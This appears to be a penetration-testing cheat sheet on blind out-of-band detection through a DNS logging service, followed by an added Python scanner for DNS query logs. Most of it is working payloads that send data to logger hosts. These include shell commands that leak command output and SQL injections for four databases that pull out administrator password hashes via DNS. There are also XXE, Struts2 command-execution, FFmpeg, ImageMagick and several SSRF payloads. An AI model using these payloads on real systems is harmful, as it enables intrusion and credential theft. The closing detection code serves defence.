Out-of-band (blind) penetration testing techniques using Cloud Eye (云眼)

Cloud Eye URL: http://eye.jozxing.cc

Its main purpose is the situation in a penetration test where a command-execution vulnerability has been found on a server, but the result is not echoed back and there is no way to confirm whether the command actually ran. Cloud Eye exists for exactly this case: when the server requests a domain name it has to resolve that name through DNS, and the DNS lookup is used to carry the result out. Setting up such an environment takes two domains and one publicly reachable server: domain A acts as the NS (authoritative name server), domain B is the one whose DNS records are collected and inspected, and domain B's DNS is delegated to domain A (i.e. A is its NS). Cloud Eye can be used from *nix, Windows and several databases; the specific usage is as follows.


1. *nix:

curl http://eye.0x80.cc/`whoami`
ping `whoami`.eye.0x80.cc

2. Windows

ping %USERNAME%.b182oj.ceye.io

0x01 SQL Injection

From http://docs.hackinglab.cn/HawkEye-Log-Dns-Sqli.html.

3. SQL Server

DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.eye.0x80.cc';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');

4. Oracle

SELECT UTL_INADDR.GET_HOST_ADDRESS('eye.0x80.cc') FROM DUAL;
SELECT UTL_HTTP.REQUEST('http://eye.0x80.cc/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://eye.0x80.cc/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT('oracle.eye.0x80.cc',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.eye.0x80.cc',80) FROM DUAL;

5. MySQL

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.eye.0x80.cc\\abc'));

6. PostgreSQL

DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.psql.eye.0x80.cc\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();

7. XML Entity Injection

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://eye.0x80.cc/xxe_test">
%remote;]>
<root/>

8. Struts2

xx.action?redirect:http://eye.0x80.cc/%25{3*4}
xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://eye.0x80.cc/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}

9. FFmpeg

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://eye.0x80.cc
#EXT-X-ENDLIST

10. Weblogic

xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://eye.0x80.cc/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search

11. ImageMagick

push graphic-context
viewbox 0 0 640 480
fill 'url(http://eye.0x80.cc)'
pop graphic-context

12. Resin

xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://eye.0x80.cc/ssrf

13. Discuz

http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://eye.0x80.cc/xx.jpg[/img]&formhash=xxoo
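Every payload above ends the same way on the target's side: its resolver issues a query for `<value>.<logger apex>`, and that query lands in the resolver's or DNS server's query log. The following added example is not from the original post; it scans constructed BIND-style query-log lines for exactly those patterns (a watchlist hit on a known logger apex, a hex-encoded leading label such as a `fn_varbintohexstr()` hash, or a long high-entropy leading label under an apex that is not on the watchlist). The log line format, the watchlist built from the logger domains named on this page, and the entropy threshold are assumptions.

```python
import math
import re

# Apex domains of the out-of-band DNS loggers mentioned on this page (assumed watchlist; extend it).
OOB_APEX_WATCHLIST = {"eye.0x80.cc", "eye.jozxing.cc", "ceye.io"}
# BIND-style query-log line (assumed format; adapt the regex to your resolver's log output).
QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\w+)")
HEX_LABEL_RE = re.compile(r"^(0x)?[0-9a-f]{16,}$", re.I)  # e.g. fn_varbintohexstr() output

# Constructed sample log (not real traffic): one benign lookup, three watchlist hits, one unknown apex.
SAMPLE_LOG = """\
client 10.0.0.5#51234: query: www.example.com IN A + (10.0.0.1)
client 10.0.0.7#42001: query: 0x0200abcdef1234567890abcdef.eye.0x80.cc IN A + (10.0.0.1)
client 10.0.0.9#40022: query: administrator.b182oj.ceye.io IN A + (10.0.0.1)
client 10.0.0.7#42002: query: oracle.eye.0x80.cc IN A + (10.0.0.1)
client 10.0.0.3#39876: query: pg8d2k1x9q0wz5n3v7b4h6j2.unknown-apex.example IN A + (10.0.0.1)
"""

def shannon_entropy(s: str) -> float:
    """Bits per character; hashes and hex blobs score far above ordinary hostnames."""
    if not s:
        return 0.0
    freq = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in freq.values())

def classify_qname(qname: str) -> list[str]:
    """Reasons a query name looks like DNS out-of-band exfiltration; empty list means benign."""
    labels = qname.rstrip(".").lower().split(".")
    reasons = []
    for i in range(len(labels)):  # any suffix matching a known logger apex
        suffix = ".".join(labels[i:])
        if suffix in OOB_APEX_WATCHLIST:
            reasons.append("watchlist:" + suffix)
            break
    leading = labels[0]  # the label that carries the exfiltrated value
    if HEX_LABEL_RE.match(leading):
        reasons.append("hex-encoded leading label")
    elif len(leading) >= 20 and shannon_entropy(leading) > 3.5:  # threshold is an assumption
        reasons.append("long high-entropy leading label")
    return reasons

def scan_query_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client, qname, reasons) for every logged query that trips a heuristic."""
    hits = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m and (reasons := classify_qname(m["qname"])):
            hits.append((m["client"], m["qname"], reasons))
    return hits
```

Running `scan_query_log(SAMPLE_LOG)` flags the four suspicious lines and their reasons, and the client address in each hit points at the host that executed the injected query.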